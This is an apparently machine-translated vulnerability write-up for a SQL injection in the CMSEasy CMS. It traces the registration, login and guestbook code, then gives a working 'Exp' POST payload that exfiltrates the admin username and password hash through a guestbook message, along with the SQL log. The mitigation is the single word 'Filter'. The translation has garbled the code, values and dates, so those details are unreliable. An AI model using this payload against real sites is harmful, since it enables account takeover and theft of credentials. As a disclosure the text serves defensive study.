Cmseasy SQL injection vulnerability 2

Cmseasy SQL injection vulnerability 2

Injection... unlimited

Front_class.php restricts username, but forgets the \ escape character.

 

If (preg_match ('/(\' | ")/', $ _ POST ['username']) | preg_match ('/(\ '| ")/', $ _ GET ['username']) | preg_match ('/(\' | ")/', $ _ COOKIE ['login _ username']) {exit ('invalid parameter ');}

Register first

User_act.php row 289:


 

Function register_action () {if (front: post ('submit ') {if (! Config: get ('reg _ on') {front: flash (lang ('the website has closed registration! '); Return;} if (config: get ('verifycode') {if (! Session: get ('verify ') | front: post ('verify ')! = Session: get ('verify ') {front: flash (lang ('verification code error! '); Return ;}} if (front: post ('username ')! = Strip_tags (front: post ('username') | front: post ('username ')! = Htmlspecialchars (front: post ('username') {front: flash (lang ('invalid username! '); Return;} skipping registration does not have many restrictions.

We registered a 123123 \ account.



Let's look at the login logic.

User_act.php row 176:



// After successful login, the cookie is set in post for escape reasons.

The cookie will change to 123123 \. Just set it manually.
 

Function login_action () {if (! $ This-> loginfalsemaxtimes () if (front: post ('submit ') {if (config: get ('verifycode') {if (! Session: get ('verify ') | front: post ('verify') <> session: get ('verify ') {front :: flash (lang ('verification code error! '). "<A href =''> ". lang ('background '). "</a>"); return ;}} if (front: post ('username') & front: post ('Password ')) {$ username = front: post ('username'); $ password = md5 (front: post ('Password ')); $ data = array ('username' => $ username, 'Password' => $ password,); $ user = new user (); $ user = $ user-> getrow (array ('username' => $ data ['username'], 'Password' => $ data ['Password']); if (! Is_array ($ user) {$ this-> login_false (); return ;}$ user = $ data; cookie: set ('login _ username ', $ user ['username']); cookie: set ('login _ password', front: cookie_encode ($ user ['Password']); session :: set ('username', $ user ['username']); $ this-> view-> from = front: post ('from ')? Front: post ('from'): front: $ from; front: flash ($ this-> fetch ('user/login_success.html '); return ;} else {$ this-> login_false (); return ;}$ this-> view-> ologinlist = ologin: getInstance ()-> getrows ('', 50 );}

 

Let's take a look at the message function.



// Check the logon status
 

Function init () {if (! Config: get ('guestbook _ enable') {alerterror ('message book function disabled ');} $ user = ''; if (cookie :: get ('login _ username') & cookie: get ('login _ password') {$ user = new user (); $ user = $ user-> getrow (array ('username' => cookie: get ('login _ username ')));} $ this-> view-> user = $ user; // put data

Guestbook_act.php 28-94
 

Function index_action () {$ this-> list_action (); if (front: post ('submit ') {if (! Front: post ('guesttel') {front: flash (lang ('Please fill in the contact number! '); Return false;} if (! Front: post ('title') {front: flash (lang ('enter the title! '); Return false;} if (! Front: post ('content') {front: flash (lang ('select the content! '); Return false;} if (config: get ('verifycode') {if (front: post ('verify') <> session :: get ('verify ') {front: flash (lang ('verification code error! '); Return false ;}} front: $ post ['checked'] = 0; // The key is this. if there is data in the user, the user's data will be saved to 123123 \. in SQL, the latter will be escaped from if (empty ($ this-> view-> user )) {front: $ post ['userid'] = 0; front: $ post ['username'] = 'tourist :'. front: $ post ['nickname'];} else {front: $ post ['userid'] = $ this-> view-> user ['userid']; front: $ post ['username'] = $ this-> view-> user ['username'];} front :: $ post ['adddate'] = date ('Y-m-d H: I: s'); front: $ post ['IP'] = front: ip (); if (! Get_magic_quotes_gpc () {front: $ post ['content'] = front: $ post ['content'];} front :: $ post ['title'] = strip_tags (front: $ post ['title']); $ data = front ::$ post; $ insert = $ this-> _ table-> rec_insert ($ data); // combine statements and query if ($ insert <1) {front :: flash (lang ('message failed! ');} Else {if (config: get ('email _ gust_send_cust') & front: $ post ['gustemail']) {$ title = "you are in ". config: get ('sitename '). "The message has been submitted"; $ this-> sendmail (front: $ post ['gustemail'], $ title, $ title);} if (config :: get ('email _ guest_send_admin ') & config: get ('email') {$ title = 'website in '. date ('Y-m-d H: I: s '). 'A new message has been sent'; $ this-> sendmail (config: get ('email '), $ title, $ title);} if (config :: get ('sms _ on') & confi G: get ('sms _ guestbook_on ') {sendMsg (front: $ post ['guesttel'], config: get ('sms _ guestbook '));} if (config: get ('sms _ on') & config: get ('sms _ guestbook_admin_on ') & $ mobile = config :: get ('site _ mobile') {sendMsg ($ mobile, front: $ post ['username']. 'In '. date ('Y-m-d H: I: s '). 'login');} front: flash (lang ('message successful! '); $ This-> view-> submit_success = true; if (front: get ('T') = 'wap') {front: redirect (url:: create ('guestbook/index/t/wap/success /'. time ();} else {front: redirect (url: create ('guestbook/index/success /'. time ()));}}}}

Insert into 'cmseasy _ guestbook '(guesttel, guestemail, guestqq, title, content, userid, username, adddate) VALUES ('20170101', '20160301', '20160301 ', 'ss', '123', '3', '1970 \ ', '2017-06-25 15:35:43 ')

123123 \ is our User Name Not controllable?

Front: $ post ['userid'] = $ this-> view-> user ['userid'];

Front: $ post ['username'] = $ this-> view-> user ['username'];

}

Front: $ post ['adddate'] = date ('Y-m-d H: I: s ');

Front: $ post ['IP'] = front: ip ();



He writes var_dump the variable.


 

array(13) {  ["nickname"]=>  string(8) "11111111"  ["guesttel"]=>  string(3) "123"  ["guestemail"]=>  string(6) "123123"  ["guestqq"]=>  string(6) "123123"  ["title"]=>  string(2) "ss"  ["content"]=>  string(6) "123213"  ["verify"]=>  string(4) "3VTQ"  ["submit"]=>  string(6) "????o¤"  ["checked"]=>  int(0)  ["userid"]=>  string(1) "3"  ["username"]=>  string(10) "123123213\"  ["adddate"]=>  string(19) "2014-06-25 15:39:36"  ["ip"]=>  string(9) "125.0.1.5"}

Since $ _ POST is an array, we can change the order.
 

["userid"]=>  string(1) "3"  ["username"]=>  string(10) "123123213\"  ["adddate"]=>  string(19) "2014-06-25 15:39:36"  ["ip"]=>  string(9) "125.0.1.5"

Why is this always behind? Because it is the last value assigned (the array is re-created)

Now, we have created the username variable before. In this way, there will be a location.
 

guesttel=123&nickname=11111111&guestemail=123123&guestqq=123123&title=ss&username=il&content=123213&verify=3vtq&submit=+%E6%8F%90%E4%BA%A4+

 

array(13) {  ["guesttel"]=>  string(3) "123"  ["nickname"]=>  string(8) "11111111"  ["guestemail"]=>  string(6) "123123"  ["guestqq"]=>  string(6) "123123"  ["title"]=>  string(2) "ss"  ["username"]=>  string(10) "123123213\"  ["content"]=>  string(6) "123213"  ["verify"]=>  string(4) "3VTQ"  ["submit"]=>  string(6) "????o¤"  ["checked"]=>  int(0)  ["userid"]=>  string(1) "3"  ["adddate"]=>  string(19) "2014-06-25 15:42:59"  ["ip"]=>  string(9) "125.0.1.5"}INSERT INTO `cmseasy_guestbook`(guesttel,guestemail,guestqq,title,username,content,userid,adddate) VALUES ('123','123123','123123','ss','123123213\','123213','3','2014-06-25 15:42:59')

Because the message only shows the user name and content, we modify the content ~

Exp:

Guesttel = 123 & nickname = 11111111 & guestemail = 123123 & guestqq = 123123 & title = ss & username = a & content =, (select concat (USERNAME, 0x7c, PASSWORD) FROM cmseasy_user where userid = 1), 90%) # & verify = 3vtq & submit = + % E6 % 8F % E4 % BA % A4 +



SQL log:

Insert into 'cmseasy _ guestbook '(guesttel, guestemail, guestqq, title, username, content, userid, adddate) VALUES ('20170101', '20160301', '20160301 ', 'ss', '2017 \ ',', (select concat (USERNAME, 0x7c, PASSWORD) FROM cmseasy_user where userid = 1), 123123213) # ', '3 ', '2017-06-25 15:49:18 ')



List_action () query the message data (in the template) to display the login status





Another point is that when splicing data, we can query the columns in the table and write other columns by ourselves ..



$ Data = front: $ post;


 

 

 

 

Solution:

Filter